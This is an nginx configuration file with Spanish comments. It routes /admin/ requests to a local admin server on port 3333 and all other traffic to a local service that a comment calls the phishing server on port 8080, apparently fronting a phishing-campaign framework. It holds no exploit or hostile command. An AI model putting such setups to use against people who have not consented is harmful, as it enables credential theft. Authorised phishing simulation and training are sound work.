worker_processes 1;

events {
    worker_connections 1024;
}

http {
    server {
        listen 80;

        # Para las rutas /admin, reescribe la URI y pásala al admin server
        location /admin/ {
            rewrite ^/admin/(.*)$ /$1 break;
            proxy_pass http://127.0.0.1:3333;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }

        # Las demás rutas se envían al servidor de phishing
        location / {
            proxy_pass http://127.0.0.1:8080;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
    }
}
